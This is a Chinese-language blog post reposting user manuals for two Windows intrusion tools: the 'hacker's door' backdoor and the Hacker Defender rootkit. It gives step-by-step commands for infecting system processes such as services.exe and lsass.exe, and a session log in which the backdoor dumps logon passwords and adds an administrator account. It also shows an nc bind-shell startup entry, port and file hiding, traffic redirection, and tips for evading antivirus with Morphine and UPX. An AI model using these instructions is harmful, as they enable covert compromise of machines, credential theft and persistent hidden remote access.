2006年05月21日

    黑客之门(hacker’s door) 1.0 版      
 黑客之门采用的目前一些先进的后门技术,它只有一个dll文件,通过感染系统文件启动自身,被
感染的系统文件大小和日期都不会改变;同时采用线程插入技术,本身没有进程;它本身不开端口,而是重用系统
进程开的任意一个端口,如80,135,139,445等,因此它的隐藏性是非常好的,而且穿透防火墙也是很容易的事情
。这个版本文件不大,只提供一些很有用的命令。目前还没有发现任何工具能查到这个后门,象fport,klist
er,RKDetector等查后门的工具都失效了。


申明:本人发布这个工具是为了向大家展示最新的后门技术,使大家能够更好的防范它,同时提高自己的技术,
对于使用本工具造成的后果,本人盖不负责。


(如果你对使用说明中有什么不理解的,可以看动画教程,在我的主页上有,
动画教程中的“0CLOGI0”应该为“NCLOGIN”,不知道这个录像软件有什么问题,
把N录成0了)


  
一、配置
  运行HDConfig.exe,选择要进行配置的黑客之门服务器端,默认是hkdoordll.dll,加载的时候会提示你输入密码,
如果你以前没有配置过,那就是初始密码yyt_hac,否则就是你自己配置的密码,然后你就可以修改密码了。这个密码用于
连接和卸载后门。


二、安装


C:\>rundll32 hkdoordll,DllRegisterServer conime.exe 1


  上面的方式只感染进程,而不感染系统文件,机器重启或进程退出后门也就退出了,适用于在自己的
机器上做测试,如果你不是做测试,就用下面的安装方式。


其中 hkdoordll是黑客之门服务器端,必须放在system32目录下,可以改名,conime.exe是你要感染的进程
默认是services.exe,如果要感染系统文件,在system32目录下的不用带路径,其它的就要带路径,第一个1是安装方式,
0表示只感染系统文件,1表示只感染进程,2表示感染系统文件,同时感染进程,默认是2;


C:\>rundll32 hkdoordll,DllRegisterServer


上面是默认安装方式,它会感染services.exe文件,以便在系统重启时启动后门,同时把自己加载到
services.exe进程中
注意:除了csrss.exe,smss.exe外,其它的系统文件都可以感染


要判断有没有安装成功,就要看system.log里的信息,方法如下:


C:\WINNT\system32>type system.log  //这个文件的生成会有延时,多type几次
系统找不到指定的文件。


C:\WINNT\system32>type system.log
9/2/2004 10:36:45 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,            Param[0]=C:\WINN
T\system32\services.exe,Param[1]=kernel.dll,Param[2]=DllRegisterServer
9/2/2004 10:36:45 l=0
Freeing “kernel.dll”:
9/2/2004 10:36:45 l=0
Couldn’t free


9/2/2004 10:36:45 l=0
Entering DLL_PROCESS_ATTACH,Process:SERVICES.EXE
9/2/2004 10:36:45 l=0
Begin to start hacker’s door….
9/2/2004 10:36:45 l=0
Loading “kernel.dll”:
9/2/2004 10:36:45 l=0
Loaded (0×10000000)


9/2/2004 10:36:45 l=0
The backdoor is installed successfully!


9/2/2004 10:36:45 l=0
UnloadDriver successfully!
9/2/2004 10:36:45 l=0
Begin to start hacker’s door….
9/2/2004 10:36:47 l=0
Start hacker’s door successfully!


C:\WINNT\system32>


看到“Start hacker’s door successfully!”就说明安装成功了,否则就是没有成功,
你可以试试感染别的系统文件。



C:\>rundll32 hkdoordll,DllRegisterServer lsass.exe


上面是感染lsass.exe文件,同时把自己加载到lsass.exe进程中


C:\>rundll32 hkdoordll,DllRegisterServer c:\winnt\explorer.exe


上面是感染explorer.exe文件,同时把自己加载到explorer.exe进程中


注意:
 安装成功或失败信息在system32\system.log里有记录。


在终端服务器中,直接安装出现如下错误:


C:\WINNT\system32>rundll32 kernel,DllRegisterServer


C:\WINNT\system32>type system.log
9/2/2004 10:46:28 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,            Param[0]=C:\WINN
T\system32\services.exe,Param[1]=kernel.dll,Param[2]=DllRegisterServer
9/2/2004 10:46:28 l=0
InjectThread:Error CreateRemoteThread,error code:8
9/2/2004 10:46:28 l=0
InjectThread failed!



C:\WINNT\system32>



因为在msdn里说


Terminal Services isolates each terminal session by design. Therefore,
CreateRemoteThread fails if the target process is in a different session
than the calling process.


因此你用下面的方法安装:


C:\WINNT\system32>psexec \\127.0.0.1 -u administrator cmd.exe


PsExec v1.31 – execute processes remotely
Copyright (C) 2001-2002 Mark Russinovich
www.sysinternals.com


Password:


Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.


C:\WINNT\system32>rundll32 kernel,DllRegisterServer


C:\WINNT\system32>type system.log  //这个文件的生成会有延时,多type几次
系统找不到指定的文件。


C:\WINNT\system32>type system.log
9/2/2004 10:36:45 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,            Param[0]=C:\WINN
T\system32\services.exe,Param[1]=kernel.dll,Param[2]=DllRegisterServer
9/2/2004 10:36:45 l=0
Freeing “kernel.dll”:
9/2/2004 10:36:45 l=0
Couldn’t free


9/2/2004 10:36:45 l=0
Entering DLL_PROCESS_ATTACH,Process:SERVICES.EXE
9/2/2004 10:36:45 l=0
Begin to start hacker’s door….
9/2/2004 10:36:45 l=0
Loading “kernel.dll”:
9/2/2004 10:36:45 l=0
Loaded (0×10000000)


9/2/2004 10:36:45 l=0
The backdoor is installed successfully!


9/2/2004 10:36:45 l=0
UnloadDriver successfully!
9/2/2004 10:36:45 l=0
Begin to start hacker’s door….
9/2/2004 10:36:47 l=0
Start hacker’s door successfully!


C:\WINNT\system32>


这样就安装成功了


三、卸载


C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac conime.exe 1


这里yyt_hac是连接密码,必须正确,否则不能卸载。其它的参数同安装意义差不多,它根据安装的
方法来卸载后门,上面一行的意思就是把后门从conime.exe卸掉。


C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac 
上面就是把后门从services.exe进程中卸掉,同时修复被感染的services.exe文件。


C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac  lsass.exe
上面就是把后门从lsass.exe进程中卸掉,同时修复被感染的lsass.exe文件。


C:\>rundll32 hkdoordll,DllUnRegisterServer yyt_hac  c:\winnt\explorer.exe


上面就是把后门从explorer.exe进程中卸掉,同时修复被感染的explorer.exe文件。


 卸载成功或失败信息在system32\system.log里有记录。
四、使用


 用nc连接被安装后门的机器的任意一个开的端口,这个端口必须能连接上,下面用139端口做例子,
然后输入“NCLOGIN 连接密码”,连接密码默认是yyt_hac,你可以在自己机器上试验,只要一台机器就可以了,
不需要在一台机器上安装,用另一台机器连接。支持多个连接,目前最多3个。
 注意:有好多人对这一步不知道怎么做,我打算做一个动画教程


先用xport扫描目标机器开的端口:


C:\>xport 192.8.8.1 1-300 -m tcp
X-Port v1.3 – command line port scanner
Code by glacier <glacier@xfocus.org>
http://www.xfocus.org


Scanning 192.8.8.1 1-300 …


Remote host:   192.8.8.1 (192.8.8.1)
Local address: 192.8.8.1
Scan mode:     TCP connect
Port count:    300
Thread count:  50


Port 135 is opened: [Unknown service]
Port 139 is opened: [Unknown service]


Port scan complete, total 300 port, 2 port is opened, use 8012 ms.


Match operate system failed.
Try to check operate system by netbios … succeed!
Remote operate system: Windows NT 5.0


上面就结果说明135,139端口都可以连接


C:\>nc 192.8.8.1 135   //用nc连接后门,先连接135端口试试
NCLOGIN 123456
        This is the server of hacker’s door made by yyt_hac,
Welcome to http://www.yythac.com,use ‘?’ to get command list
HKDOOR>?   //得到命令列表
?——————-[command],Get command list and the descript of the command
hdver——————-Get the version of hacker’s door installed
findpass——————-Get all logon user’s username and password
open3389——————-[port] [/r],with ‘port’ to special termserver ’s port
,with ‘/r’ to reboot system
opentelnet——————-[port],open telnet server with [port],default port
is 23
pslist——————-Get process list from remote machine
pskill——————-pID,Kill the process of remote machine
getsysinfo——————-Get the system info from remote machine
shutdown——————-[/r],With ‘/r’ to reboot system,else power off system


exitshell——————-Exit the shell of hacker’s door
winexec——————-command,execute command using winexec function
openshell——————-[cmdfile],use cmdfile to create a process to execute
 command
HKDOOR>findpass   //查找当前登录用户的密码
The session:0 login information is:
Domain:YYT_HAC,User:Administrator,Password:123456
HKDOOR>hdver
The version of hacker’s door server is 1.0
Welcome to http://www.yythac.com
HKDOOR>getsysinfo   //得到目标机器的基本信息
Number of CPU:1
Type of CPU:Intel  Pentium III or high
System Version:Windows nt 5.0 build:2195
Service Pack:4.0
Product type:Windows 2000 Server
Computer Name:YYT_HAC
System Dir:C:\WINNT\system32
HKDOOR>winexec “net user test /add” //不开命令行窗口执行命令,加一个test的用户
The command execute sucessfully!
HKDOOR>winexec “net localgroup administrators test /add”  //把test用户加入管理员组
The command execute sucessfully!
HKDOOR>openshell    //开命令行窗口
Command shell is opened successfully!
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.


C:\WINNT\system32>
C:\WINNT\system32>cd \
cd \


C:\>net user     //查看用户,发现test用户加进来了
net user


\\ 的用户帐户


——————————————————————————-
__vmware_user__          Administrator            ASPNET
Guest                    IUSR_YYT                 IWAM_YYT
TsInternetUser           VUSR_YYT                 VUSR_YYT_HAC
test
命令运行完毕,但发生一个或多个错误。



C:\>dir
dir
 驱动器 C 中的卷是 windows
 卷的序列号是 3C85-544F


 C:\ 的目录


2004-03-24  12:12       <DIR>          DELL
2004-08-08  10:04       <DIR>          Documents and Settings
2004-09-02  22:20       <DIR>          Downloads
2004-03-22  09:28       <DIR>          DRIVERS
2004-05-30  21:21       <DIR>          drvrtmp
2004-09-02  22:44       <DIR>          hkdoor
2003-08-18  03:02       <DIR>          Inetpub
2004-04-28  16:20       <DIR>          log
2004-05-30  00:02       <DIR>          My Music
2004-09-02  18:17       <DIR>          Program Files
2003-08-16  16:03       <DIR>          WINDOWS
2004-09-02  22:20       <DIR>          WINNT
               0 个文件              0 字节
              12 个目录    324,079,616 可用字节


C:\>set
set
ALLUSERSPROFILE=C:\Documents and Settings\All Users.WINNT
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=YYT_HAC
ComSpec=C:\WINNT\system32\cmd.exe
DRIVERNETWORKS=C:\PROGRA~1\COMPUW~1\DRIVER~1\DRIVER~2
DRIVERWORKS=C:\PROGRA~1\COMPUW~1\DRIVER~1\DRIVER~3
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Os2LibPath=C:\WINNT\system32\os2\dll;
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\system32\WBEM
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 9 Stepping 5, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0905
ProgramFiles=C:\Program Files
PROMPT=$P$G
SystemDrive=C:
SystemRoot=C:\WINNT
TEMP=C:\WINNT\TEMP
TMP=C:\WINNT\TEMP
USERPROFILE=C:\Documents and Settings\Default User.WINNT
windir=C:\WINNT


C:\>ver
ver


Microsoft Windows 2000 [Version 5.00.2195]


C:\>d:
d:
设备未就绪。


C:\>f:
f:


F:\>dir
dir
 驱动器 F 中的卷是 vc
 卷的序列号是 EED5-F051


 F:\ 的目录


2004-08-10  14:29       <DIR>          Documents and Settings
2004-03-08  18:07       <DIR>          fore
2004-03-22  20:01       <DIR>          i386
2003-09-07  05:37       <DIR>          My Music
2004-03-22  16:24       <DIR>          NTDDK
2004-06-17  18:15       <DIR>          ON2000
2004-08-19  16:26       <DIR>          ON2000_new
2004-03-26  13:59       <DIR>          Perl
2004-07-28  12:46       <DIR>          Program Files
2004-03-25  09:19       <DIR>          sourcecode
2004-07-28  12:44       <DIR>          WINNT
2004-09-02  22:43       <DIR>          WUTemp
               0 个文件              0 字节
              12 个目录    921,036,288 可用字节


F:\>pslist    //查看目标机器上的进程
ProcessID         ProcessName
0                   [System Process]
8                   System
184                 SMSS.EXE
208                 CSRSS.EXE
228                 WINLOGON.EXE
256                 services.exe
268                 LSASS.EXE
476                 svchost.exe
504                 spoolsv.exe
544                 msdtc.exe
652                 svchost.exe
680                 mdm.exe
736                 alertsvc.exe
804                 navapsvc.exe
884                 npssvc.exe
1204                regsvc.exe
1216                mstask.exe
1252                termsrv.exe
1284                vmware-authd.ex
1296                WinMgmt.exe
1324                dfssvc.exe
1336                svchost.exe
1476                explorer.exe
1636                pctspk.exe
1684                hkcmd.exe
1704                Apoint.exe
1648                PFW.exe
1708                prpcui.exe
1732                realsched.exe
1740                ApntEx.exe
1748                internat.exe
1768                conime.exe
1804                navapw32.exe
640                 inetinfo.exe
1516                svchost.exe
1856                FlashBack Recor
1816                DG-506C.exe
1580                TASKMGR.EXE
1588                notepad.exe
388                 notepad.exe
2024                CMD.EXE
2036                NC.EXE
2004                CMD.EXE


F:\>pskill 1684   //杀掉进程id为1684的进程
The process has been killed!


F:\>exit   //退出命令行窗口


HKDOOR>?   //得到命令列表
?——————-[command],Get command list and the descript of the command
hdver——————-Get the version of hacker’s door installed
findpass——————-Get all logon user’s username and password
open3389——————-[port] [/r],with ‘port’ to special termserver ’s port
,with ‘/r’ to reboot system
opentelnet——————-[port],open telnet server with [port],default port
is 23
pslist——————-Get process list from remote machine
pskill——————-pID,Kill the process of remote machine
getsysinfo——————-Get the system info from remote machine
shutdown——————-[/r],With ‘/r’ to reboot system,else power off system


exitshell——————-Exit the shell of hacker’s door
winexec——————-command,execute command using winexec function
openshell——————-[cmdfile],use cmdfile to create a process to execute
 command
HKDOOR>exitshell  //退出后门
Exit Successfully


C:\>nc 192.8.8.1 139  //通过139端口连接后门
NCLOGIN 123456
        This is the server of hacker’s door made by yyt_hac,
Welcome to http://www.yythac.com,use ‘?’ to get command list
HKDOOR>openshell
Command shell is opened successfully!
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.


C:\WINNT\system32>
C:\WINNT\system32>rundll32 kernel,DllUnRegisterServer 123456  //卸载后门
The command is too long to recv completely!


C:\WINNT\system32>exit


HKDOOR>exitshell
Exit Successfully


C:\>



五、和我联系


如果你发现的bug,请和我联系,最好说明使用的环境,同时把system32\system.log发给我。


个人主页:http://www.yythac.com
Email:webmaster@yythac.com
      yyt_hac@163.com
QQ:47090005


 


 

PJF的BLOG:http://pjf.blogone.net/


Rootkit.com:http://www.rootkit.com/index.php


持续补充中……

=============[Hacker defender -中文使用说明]================


                      NT Rootkit

                      ———-


作者:     Holy_Father <_father@phreaker.net”>holy_father@phreaker.net>

        Ratter/29A <ratter@atlas.cz>

版本:     1.0.0


开发日期:   01.01.2004


网站:     http://rootkit.host.sk, http://hxdef.czweb.org


开发群:   ch0pper <THEMASKDEMON@flashmail.com>

      aT4r <at4r@hotmail.com>

      phj34r <phj34r@vmatrics.net>

      unixdied <0edfd3cfd9f513ec030d3c7cbdf54819@hush.ai>

      rebrinak

      GuYoMe

      ierdna <ierdna@go.ro>

      Afakasf <undefeatable@pobox.sk>


说明:   Czech & English by holy_father

      French by GuYoMe

      Chinese by Ziqi


 


=====[1,目录]==============================================


1. 目录

2. 概要

    2.1 关于

    2.2 申明

3. 使用说明

4. Ini文件说明

5. Backdoor

    5.1 Redirector

6. 技术支持

    6.1 版本

    6.2 钩子API函数

    6.3 已知的 bugs

7. Faq

8. 文件


 


=====[ 2. 关于]================================================

Hacker defender (hxdef)是一个使用于Windows NT 4.0, Windows 2000 以及Windows XP操作系统的一个NTROOKIT,它也能运行于之后的基于NT的操作系统。主要代码是由DELPHI 6完成。新的功能使用汇编书写。驱动代码由C完成。后门和redirector客服端大部分使用 Delphi 6完成。

=====[ 2.1 概要 ]=============================================

程序的主要功能是在所有运行中的进程中重写分割内存,重写一些基本的模块改变进程的状态,它几乎能够改写所有不影响系统稳定和正在运行中的进程。

程序能够完全隐藏,现在能够做的有隐藏文件、进程、系统服务、系统驱动、注册表的键值和键、开放端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动,并且隐蔽地控制被隐藏进程。程序安装后能构造后门、注册表、系统服务,构造系统驱动。其本身的后门技术允许其植入 redirector。

=====[ 2.2 申明]====================================================

本项目1.0.0版本是开发源代码

使用Hacker defender所造成的后果作者本人概不负责。


=====[ 3. 用法 ]==================================================

    一个使用hxdef的简单例子:


    >hxdef100.exe [inifile]

或者

    >hxdef100.exe [switch]

直接执行EXE文件,不带任何的参数时候,默认的inifile文件为程序名.ini 。


当你执行hedef100不指定ini文件,或者你以参数模式运行时候,默认的文件是


hxdef100.ini。


下面的参数是有效的:

    -:installonly     -     只安装服务,不运行

    -:refresh     -     从INI文件中更新设置

    -:noservice     -     正常运行不安装服务

    -:uninstall     -     移除hxdef删除所有运行的后门连接,同时停止hxdef服务

                 


例如:

    >hxdef100.exe -:refresh


Hxdef拥有默认INI文件,但是我们强烈的推荐你建立自己的ini文件。关于ini文件的介绍可以看第4部分ini文件部分。

参数 -:refresh and -:uninstall 来源于本来的EXE文件。这就意味这你只要知道hxdef的运行路径和EXE名,就能够改变它的设置或者进行移除工作。


=====[ 4. Ini文件 ]============================================

ini文件必须包含了9个部分: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space], [Hidden Ports]和[Settings]。


在 [Hidden Table], [Root Processes], [Hidden Services]和[Hidden RegValues] 中能够使用*代替后面的字符,星号仅仅使用于字符的后面,任何在*之前的都是无效的。所有的在字符之前和之后的空格也是无效的。


例如:

[Hidden Table]

hxdef*


将开始隐藏所有在Hidden Table中以”hxdef”开头的文件、文件夹和系统进程。


在该文件列表中的所有文件和文件夹都将在文件管理器中消失。在这个列表中的程序也会在任务管理器中被隐藏。必须确保主要文件,INI文件,你的后门文件和驱动文件被包含在列表中。

在程序列表中的主进程对感染具有免淤能力,你只能利用这些主程序才能看见隐藏的文件,文件夹和程序。所以,主进程是为rootkit管理员所使用的。

服务和驱动所组成的Hidden Services列表将会隐藏在数据库中的安装服务和驱动。rootkit主程序的服务名默认为HackerDefender100,rootkit驱动的驱动名默认为HackerDefenderDrv100。它们两者都可以通过ini文件进行修改。


Hidden RegKeys中列出的注册表键值将会被隐藏,Rootkit在注册表中有四个键值:默认的是HackerDefender100, LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100 如果你要重新命名服务名或者驱动名,你需要在列表中做相应的改变。

开始2个键值是和你的服务据用相同名字的,接下来的键值是LEGACY_名字。例如,如果你改变你的服务名称为BoomThisIsMySvc ,那么在注册表中,应该是这样表示的,LEGACY_BOOMTHISISMYSVC。


在Hidden RegValues列出的注册表的值将会被隐藏。


Startup Run列表中列出的是rootkit程序运行之后的自启动程序。这些程序和ROOTKIT具有一样的特权。程序名和它后面的参数以?分开。不要使用”字符,程序将会在用户登陆以后终止,在用户登陆以后可以使用一般和常见的方法。你可以使用下面这些快捷方式。

%cmd%标准系统的shell和路径

%cmddir%标准系统的shell文件夹

%sysdir%     – 系统文件夹

              (e.g. C:\winnt\system32\)

%windir%     – 标准系统文件夹

              (e.g. C:\winnt\)

%tmpdir%     – 临时文件夹

              (e.g. C:\winnt\temp\)


例如:

1)

[Startup Run]

c:\sys\nc.exe?-L -p 100 -t -e cmd.exe

nc-shell将会在rootkit运行以后监听100端口


2)

[Startup Run]

%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt

将rootkit启动时间保存在系统临时文件夹夹starttime。Txt文件。

(%TIME%仅仅运行于Windows2000以上的操作系统。)


Free Space中列出的驱动硬盘名和容量大小是你想增加的硬盘,它的格式是X:NUM,其中X表示磁盘驱动器的名称,NUM表示你要增加的磁盘的容量。


例如:

[Free Space]

C:123456789

这将在C盘增加大约123M的磁盘空间。


Hidden Ports中列出的是你需要隐藏程序的端口,比如使用OpPorts, FPort, Active Ports, Tcp View等的程序,它最多拥有2行。第1行的格式是TCP:tppport1,tcpport2,tcpport3 ,第2行的格式是UDP:udpport1,udpport2,udpport3 …


例如:

1)

[Hidden Ports]

TCP:8080,456


这将隐藏2个TCP端口:8080和456

2)

[Hidden Ports]

TCP:8001

UDP:12345

这将隐藏2个端口:TCP的8001和UDP的12345。


3)

[Hidden Ports]

TCP:

UDP:53,54,55,56,800

隐藏5个端口,都为UDP端口:53,54,55,56,800。


Settings包含了8个值:Password, BackdoorShell, FileMappingName, ServiceName,ServiceDisplayName, ServiceDescription, DriverName 和 DriverFileName。

名。

16位字符的Password被用于后门链接和转向,密码能根据短一些,余下的用空格代替。

BackdoorShell是复制于系统的SHELL文件,它被后门创建于一个临时的目录下。

FileMappingName,当钩子进程被存储时,用于共享内存。

ServiceName是rootkit服务

ServiceDisplayName为rootkit显示的服务

ServiceDescription位rootkit的服务描述

DriverName以hxdef驱动命名

DriverFileName以hxdef驱动文件命名


例如;


[Settings]

Password=hxdef-rulez

BackdoorShell=hxdef?.exe

FileMappingName=_.-=[Hacker Defender]=-._

ServiceName=HackerDefender100

ServiceDisplayName=HXD Service 100

ServiceDescription=powerful NT rootkit

DriverName=HackerDefenderDrv100

DriverFileName=hxdefdrv.sys

   

这就意味着你的后门密码为hxdef-rulez,后门将复制系统shell文件(通常是CMD.EXE)为hxdef?.exe到临时目录。共享内存将变为”_.-=[Hacker Defender]=-._“,服务名为”HackerDefender100″,它显示的名称为”HXD Service 100″,它的描述为”poweful NT rootkit”,驱动名为”HackerDefenderDrv100″,驱动将被存储于一个叫做”hxdefdrv.sys”的文件中。


扩展字符|, <, >, :, \, / 和 “在所有的行中都会被忽略,除了[Startup Run], [Free Space] 和 [Hidden Ports] 项目和在 [Settings] 中first = character后面的值。使用扩展字符能然你的INIFILE文件摆脱杀毒软件的查杀。

例如:

Example:

[H<<>a/"ble]

>h”xdef”*


和下面的是一样的。

[Hidden Table]

hxdef*

更多的例如可以参照hxdef100.ini 和hxdef100.2.ini文件。

所有的在ini文件中的字符串除了那些在Settings 和 Startup Run中的,都是无效的。




=====[ 5. Backdoor ]=========================================

Rootkit程序 Hook了一些API的功能,连接接收一些来自网络的数据包。如果接收的数据等于256个字节,密码服务被确认,复制的SHELL被临时创建,这种情况建立以后,下一次的数据接收被重定向到这个SHELL上。

因为rootkit程序 Hook了系统中所有进程,所有在服务器上的TCP端口都将变为后门。例如,如果目标主机开放了提供HTTP服务的80端口,这个端口也能作为一个有效的后门。例外的是这个开放端口的进程不会被Hook,这个后门仅仅工作于服务器的接收缓冲大于或者等于256个字节。但是这个特征几乎适合于所有标准的服务,像IIS,APACHE,ORACLE等。后门能够隐藏是因为所有的数据都通过系统上面提供的服务转发。所以你不能使用一些简单的端口扫描软件找到它,并且它能轻易的穿过_blank”>防火墙


在测试发现IIS服务过程中,HTTP服务不能记录任何的连接日记,FTP和SMTP服务器仅仅能记录结束的断开连接。所以,如果你运行hxdef在有IIS Web服务服务器上面,HTTP端口跟你是连接机器使用的后门的最好端口。

如果你想连接后门的话,你将不得不使用使用一些特别的客户端,程序bdcli100.exe就是被用于如此的。


用法:bdcli100.exe host port password

例如:

>bdcli100.exe www.windowsserver.com 80 hxdef-rulez

连接服务www.windowsserver.com使用默认的密码。客户端1.0.0版本不兼容其他老的版本。


=====[ 5.1 Redirector ]==========================================


Redirector是基于后门技术。第一个连接包和后门连接一样。这就意味着你能使用相同的端口。下一个包是仅仅为Redirector特殊的包,这些包由基于运行用户电脑的重定向器生成.第一个重定向的包连接特定的目标主机和端口。


Redirectors的设置保存在与EXE文件同名的INI文件中(所以默认的是rdrbs100.ini)。如果这个文件不存在,那么在EXE文件运行的时候它会自动建立一个。最好不要额外的修改INI文件。所有的设置都可以在console中进行改变。


当ROOTKIT被安装时,如果我们需要使用服务器上面的redirectors功能,我们首先要在本地运行程序。在控制台上我们可以在有HXDEF的服务器上面建立一个映射端口路由。最后我们连接本地端口并且转换数据。转向的数据被rootkit的密码加密。在这个版本中连接的速度被限制在256K左右。在这个版本中redirectors并不适合于高速连接。Redirectors也会受到安装有rootkit的服务器的限制,而且Redirectors仅仅使用TCP协议连接。在这个版本中Redirectors base有19条命令,他们并不是非常的敏感。关于功能的详细描述可以使用HELP命令。在Redirectors base启动时,startup-list中的命令也被执行。startup-list中的命令可以用使用SU启动的CMD进行编辑。


Redirector区分于2种连接类型(HTTP和其他)。如果连接是其他类型的,数据包将不会被改变。如果是HTTP类型,在HTTP文件头的HOST参数将会改变为目标服务器。一个base的最大Redirector数量是1000。

Redirector仅仅适用于NT结构,只有在拥有图标的NT程序下你才能使用HIDE命令隐藏控制台。只有在NT下才能无声无息的运行,没有数据输出,没有图标,仅仅执行startup-list中的命令。


例子:

1)得到端口映射信息

>MPINFO

    No mapped ports in the list.


2)增加MPINFO命令到startup-list并且得到startup-list中的命令。

    >SUADD MPINFO

    >sulist

0)     MPINFO


3)使用HELP命令。


    >HELP

    Type HELP COMMAND for command details.

    Valid commands are:

    HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD,


DEL,

    DETAIL,     SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST

    >HELP ADD

    Create mapped port. You have to specify domain when using HTTP


type.

    usage: ADD



    SERVER> [TYPE] [DOMAIN]

    >HELP EXIT

    Kill this application. Use DIS flag to discard unsaved data.

    usage: EXIT [DIS]


4)增加端口映射,我们在本地100端口进行监听,ROOTKIT安装在服务器200.100.2.36的80端口上,目标服务器是www.google.com80端口。,rootkit的密码是bIgpWd,连接类型HTTP,目标主机(www.google.com)我们知道它的IP地址是216.239.53.100。

>ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com


ADD命令可以不加任何参数的运行,在这个例子中我们要求每一个参数都要分开



5)现在我们再使用MPINFO检查一下映射端口

>MPINFO

    There are 1 mapped ports in the list. Currently 0 of them


open.




6)列举端口映射表:

>LIST

    000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP


7)一个端口映射的详细描述:

>DETAIL 0

    Listening on port: 100

    Mapping server address: 200.100.2.36

    Mapping server port: 80

    Target server address: 216.239.53.100

    Target server port: 80

    Password: bIgpWd

    Port type: HTTP

    Domain name for HTTP Host: www.google.com

    Current state: CLOSED


8)在没有密码的情况下,我们能在端口映射服务器200.100.2.36上测试rootkit是否已经安装(但是如果我们能确认它这样做就不再需要)

    >TEST 0

    Testing 0) 200.100.2.36:80:bIgpWd – OK


如果测试失败则显示:

    Testing 0) 200.100.2.36:80:bIgpWd – FAILED


9)在我们没使用之前端口仍然是没有开放的。我们不得不使用OPEN命令打开它,当端口开放时,我们也能使用CHOSE命令关闭端口。我们能使用标志符ALL应用这些命令在列表中的所有端口,这个过程可能需要一段的时间。

    >OPEN 0

    Port number 0 opened.

    >CLOSE 0

    Port number 0 closed.


或者


    >OPEN ALL

    Port number 0 opened.

10)要保存当前的设置和列表我们可以使用SAVE命令,将保存所有的设置到ini文件中。(保存也会通过命令EXIT执行,而不需要DIS标志)

   

    >SAVE

    Saved successfully.


打开的端口能够转换我们需要的所有数据。限制你能打开你喜欢的浏览器输入网址http://localhost:100/,如果没有什么问题的话,你会看见打开的是www.google.com的主页。


第一个数据包跟你会延迟5秒钟左右,但是其他的限制仅仅取决于服务器的速度,根据这个版本的转向技术,你联网的速度大约在256K左右。


=====[ 6. 技术发行]========================================

这部分包含了一些对于普通用户无关紧要的信息。这部分可能适合所有的测试者和开发人员阅读。


=====[ 6.1 版本 ]===========================================


=====[ 6.3 已知的BUGS]=====================================

在这个版本有一个已知的bugs。

1)     当你在控制台使用右键或者使用控制台菜单复制大量的数据到剪切板的时候,后面客户端可能会崩溃。如果程序在运行过程中如上所说,你仍然能使用Ctrl+Ins, Shift+Ins从剪切板中粘贴数据。


如果你发现了BUGS请报告给公共留言簿(如果你是测试人员请发送到测试人员留言簿)或者E-mail到rootkit@host.sk。但是必须保证你已经阅读了使用说明FAQ部分,todo列表和留言簿,并且你在写之前还没有任何其他的相关资料。


=====[ 7. Faq ]===================================================

因为在留言簿上出现了大量的简单问题,使我意识到写这个FAQ部分在这个使用说明中。在你问任何问题之前请先阅读这个使用说明2次并且特别注意这个部分。然后查看留言簿中以前的帖子,如果你发现你还使不能找到解决的答案,请把你的问题发到留言簿中。


这些问题是

1)     我下载了hxdef,运行了但不能删除它,如果我不能看见它的进程、服务和文件,我怎么删除它?


A:如果你保留了最初的设置你可以在SHELL中停止服务

    >net stop HackerDefender100

hxdef将会停止服务完全的卸载。这和-:uninstall是一样的,但是你不需要知道hxdef在什么地方。如果你在ini文件设置中更改了服务名,在CMD下输入:

    >net stop ServiceName

其中ServiceName 是你在ini文件进行设置的服务名。

如果你忘记了服务名,你可以使用系统启动光盘重新启动到DOS环境,找出hxdef的ini文件,打开并找出它的服务名。


2)     一些人黑客我的机器,运行了hxdef我不能删除它。我怎么才能卸载它和所有安装在我电脑上的后门程序?


A:唯一能做的就是重新安装你的操作系统。但是如果你能和上面的情况一样找出ini文件,根据ini文件卸载hxdef找出所有在Hidden Table中列出的文件,确认这些文件并且完全删除它们。


3)     这个程序能被杀毒软件查杀吗?如果是,怎么才能让它不被查杀?


A:是的,不仅仅exe文件会被查杀,一些杀毒软件甚至能查杀ini文件和驱动文件。第二个问题的答案就是,你能很轻松的躲避查杀。在hxdef主页你可以发现一个工具叫做Morphine,如果你在hxdef的exe文件上使用了Morphine,你会得到一个新的exe文件,这个文件不会被普通的杀毒软件查杀。Ini文件也能设计为躲避杀毒软件,你可以增加一些扩展字符以抵抗杀毒系统。详细的可以看4.ini文件部分。也可以看包含的ini文件,这2个样本是一样的,但是第一个使用了扩展字符让它能够躲过杀毒软件。也许在使用Morphine之前最好的方法是使用UPX,UPX将会减少hedef的exe文件大小,Morphine将会遮蔽杀毒软件,关于更多的可以看Morphine的使用说明。


4)     当服务器开放135/TCP, 137/TCP, 138/TCP, 139/TCP or 445/TCP端口的时候,为什么我不能通过这些端口连接我的后门?


